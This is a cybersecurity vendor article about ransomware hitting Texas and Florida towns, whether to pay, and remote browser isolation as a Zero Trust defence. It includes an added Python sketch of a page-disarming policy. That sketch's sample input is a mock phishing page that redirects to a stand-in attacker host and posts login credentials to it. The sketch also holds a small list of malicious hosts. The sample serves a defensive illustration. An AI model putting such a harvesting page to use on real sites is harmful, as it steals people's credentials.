By Gerry Grealish, Chief Marketing Officer, Ericom Software
On August 16, 2019, 22 small towns, municipalities and local governments in Texas were hit by a coordinated ransomware attack. The hackers demanded a total of $2.5 million to unlock the files. Almost one month later, not a single entity had paid the ransom and over half those affected were up and running after restoring from backups.
In June of the same year, Lake City, Florida, a small town of just over 12,000 people, was crippled by a ransomware attack that immobilized the city, preventing employees from using email and citizens from paying bills online. The city opted to pay a ransom of $460,000 in bitcoin to the attackers. Riviera Beach, another Florida city, also suffered a ransomware attack and paid nearly $600,000 in ransom. New Bedford, Massachusetts rejected demands for $5.3 million in ransom, as did Atlanta. The list goes on.
To Pay or Not to Pay?
The question that every government agency will ultimately have to face when hit by a ransomware attack is whether it should pay the ransom or not.
Unfortunately, security experts and law enforcement officials often offer conflicting advice. Law enforcement officials discourage governments from paying the ransom, since capitulation incentivizes cybercriminals to continue targeting similar organizations. Security and business consultants, such as Forrester, acknowledge that paying the ransom is a viable option for retrieving encrypted information, as well as the fastest and sometimes the least costly.
One practical concern is that paying the ransom does not guarantee that agencies will retrieve the information that was seized. A survey of nearly 1,200 IT security professionals across 17 countries, conducted by CyberEdge Group, a research and marketing firm, revealed that of the 38.7% of respondents who chose to pay the ransom following an attack, less than one fifth (19.1%) were able to regain access to all critical data.
Plan of Cyberattack
Ransomware attacks are most often initiated via spear-phishing emails with appeals customized to targeted employees. When the unsuspecting recipient clicks on a malicious link within the email or opens an infected attachment, web-based command and control servers deploy malware payloads via device browsers.
Despite being one of the oldest hacking techniques around, phishing remains the vehicle of choice for malicious actors, who excel at generating innovative and highly effective ways to manipulate recipients. The rise of free hosting providers has significantly contributed to the increase in phishing volume, since malicious actors can easily and inexpensively launch sites and, importantly, quickly take them down before they can be categorized as malicious.
By coupling free hosting sites with targeted social engineering techniques, threat actors easily defeat traditional, reputation-based cybersecurity tools and systems. Detection and categorization-based cybersecurity solutions are powerless against this onslaught. And while employee training is essential, human error is inevitable. Just one erroneous click by a distracted employee can paralyze an entire city.
According to a 2019 report from Cybersecurity Ventures sponsored by Herjavec Group, a business will fall victim to a ransomware attack every 14 seconds in 2019, and every 11 seconds in 2021. Ransomware damages are predicted to reach a global cost of $11.5 billion in 2019.
Secure Zero Trust Browsing for Government Entities
Government entities can circumvent most cyberthreats if they operate under the Zero Trust principle that no individual or element is to be trusted. No traffic, whether internal or external, should be assumed safe.
Zero Trust solutions leverage granular security policies that allow organizations to control, restrict and monitor communications between data, applications, networks and individuals. All elements are micro-segmented, and access is restricted in accordance with stringent security policies and user authentication.
It’s a basic fact of contemporary life that the internet is not safe. In fact, the internet is a critical part of the delivery chain for most threats. Zero Trust supporters address this fact by recommending that known secure sites be whitelisted and access denied to all other sites. This is, however, highly impractical for most businesses, which rely on the internet for many essential business tasks. Limiting access reduces productivity, leaves employees frustrated and increases workloads for IT staff, who must divert attention from critical tasks to manage access requests. Users are forced to wait for IT approval and intervention in order to complete their tasks.
When it comes to browsing, Zero Trust security must ensure that no site can interact with vulnerable endpoint browsers and through them, organizational networks. One method of implementing Zero Trust browsing that is rapidly gaining traction is remote browser isolation (RBI), which sequesters all direct interaction with websites in virtual browsers located remote from endpoints.
When a user opens a browser or tab, a virtual browser is spun up within a container in the cloud. All direct contact with websites and applications occurs within that container; no content reaches the end user's device. A safe media stream is sent from the remote browser to the user's endpoint browser, allowing the user to interact naturally with the site. Some RBI solutions also sanitize downloads through a content disarm and reconstruction process before releasing them to the endpoint. When the user stops browsing, the container, along with all content from the browsed site, is destroyed.
RBI protects government agencies from users’ erroneous clicks on phishing emails by opening linked sites in the remote container. In addition, some solutions address credential theft by blocking known malicious sites and opening suspicious sites in read-only mode.
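To make the policy and the disarm step concrete, here is an added Python sketch; it is not Ericom's code and not part of the original article. It models the three decisions described above (block known malicious sites, open suspicious sites in read-only mode, isolate everything else), a content disarm and reconstruction pass that removes active content and, in read-only mode, every input element so that credentials cannot be typed into a suspected phishing page, and an ephemeral workspace standing in for the cloud container that is torn down when the session ends. The hostnames, reputation lists and sample page are constructed for the example; a real RBI product streams rendered output to the endpoint rather than returning HTML.

```python
"""Zero Trust browsing policy and content disarm, modelled in miniature.

Added illustration, not a vendor's product code. Reputation data and the
sample page are constructed; hostnames ending in .example are hypothetical.
"""
import html
import os
import tempfile
from html.parser import HTMLParser

# Constructed reputation data; a deployment would query threat-intel feeds.
KNOWN_MALICIOUS = {"evil.example"}
SUSPICIOUS = {"free-host.example"}   # e.g. newly seen free-hosting domains

# Elements that execute or embed active content: always removed.
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "applet"}
# Elements that accept user input: removed in read-only mode.
INPUT_TAGS = {"form", "input", "textarea", "button", "select"}
# Void elements carry no closing tag, so they never change nesting depth.
VOID_TAGS = {"input", "br", "img", "hr", "meta", "link", "area", "base",
             "col", "embed", "source", "track", "wbr"}

# Constructed sample: a credential-harvesting page with active content.
SAMPLE_PAGE = (
    '<html><body onload="steal()">'
    '<h1>Sign in to your account</h1>'
    '<script>document.location="http://evil.example/c2"</script>'
    '<form action="http://evil.example/harvest" method="post">'
    'User: <input name="u"> Pass: <input type="password" name="p">'
    '<button>Login</button></form>'
    '<a href="javascript:alert(1)">Help</a>'
    '<p>Contact &amp; support</p>'
    '</body></html>'
)


def decide_action(hostname: str) -> str:
    """Map a destination host to a policy: block, read_only or isolate."""
    host = hostname.lower()
    if host in KNOWN_MALICIOUS:
        return "block"
    if host in SUSPICIOUS:
        return "read_only"
    return "isolate"   # default: never trust, always render remotely


class Disarmer(HTMLParser):
    """Rebuild a page keeping only passive markup (disarm and reconstruct)."""

    def __init__(self, read_only: bool):
        super().__init__()           # convert_charrefs=True: data arrives unescaped
        self.read_only = read_only
        self.out = []
        self.skip_depth = 0          # >0 while inside a dropped element subtree
        self.stripped = 0            # removed elements and attributes

    def _drop(self, tag: str) -> bool:
        return tag in ACTIVE_TAGS or (self.read_only and tag in INPUT_TAGS)

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag not in VOID_TAGS:
                self.skip_depth += 1
            return
        if self._drop(tag):
            self.stripped += 1
            if tag not in VOID_TAGS:
                self.skip_depth = 1  # swallow the whole subtree
            return
        safe = []
        for name, value in attrs:
            # Event handlers and javascript: URLs are script in disguise.
            if name.lower().startswith("on") or (
                    value and value.strip().lower().startswith("javascript:")):
                self.stripped += 1
                continue
            safe.append(name if value is None
                        else f'{name}="{html.escape(value, quote=True)}"')
        self.out.append("<" + tag + "".join(" " + a for a in safe) + ">")

    def handle_endtag(self, tag):
        if tag in VOID_TAGS:
            return
        if self.skip_depth:
            self.skip_depth -= 1
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        self.stripped += 1           # comments can hide conditional payloads

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def browse(hostname: str, raw_html: str) -> dict:
    """One isolated session: decide policy, disarm inside a disposable workspace."""
    action = decide_action(hostname)
    if action == "block":
        return {"action": action, "safe_html": "", "stripped": 0,
                "workspace_destroyed": True}
    # TemporaryDirectory stands in for the disposable cloud container.
    with tempfile.TemporaryDirectory(prefix="rbi-") as workspace:
        staged = os.path.join(workspace, "page.html")
        with open(staged, "w", encoding="utf-8") as fh:
            fh.write(raw_html)       # untrusted content never leaves here
        parser = Disarmer(read_only=(action == "read_only"))
        with open(staged, encoding="utf-8") as fh:
            parser.feed(fh.read())
        parser.close()
        safe_html = "".join(parser.out)
        stripped = parser.stripped
    # Leaving the block destroys the workspace and everything the site wrote.
    return {"action": action, "safe_html": safe_html, "stripped": stripped,
            "workspace_destroyed": not os.path.exists(workspace)}


if __name__ == "__main__":
    for host in ("evil.example", "free-host.example", "news.example"):
        print(host, browse(host, SAMPLE_PAGE))
```

Running the block shows the three outcomes side by side: the known malicious host is blocked outright, the suspicious host is rendered with its script, event handler, `javascript:` link and entire login form removed, and the unknown host keeps its form but still loses every piece of active content; in all cases the workspace is gone once the session returns.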
Public sector organizations are on track to embrace the Zero Trust paradigm. Until that happens, however, their security situation will continue to be challenging and complex. Zero Trust Browsing using RBI provides a practical path to rapidly reduce threats and realize both security and productivity when it comes to threats delivered via the web.
About the Author
Gerry Grealish is the Chief Marketing Officer at Ericom, where he is responsible for the company’s outbound marketing and business development activities. He is a security industry veteran, with over 20 years of Marketing and product experience in cybersecurity and related technologies. In addition to his work at Ericom, Gerry is a frequent contributor to cybersecurity dialogue in areas such as Zero Trust Security, Cloud Access Security Brokers (CASB), and Web/Cloud Security. Connect with Gerry on LinkedIn.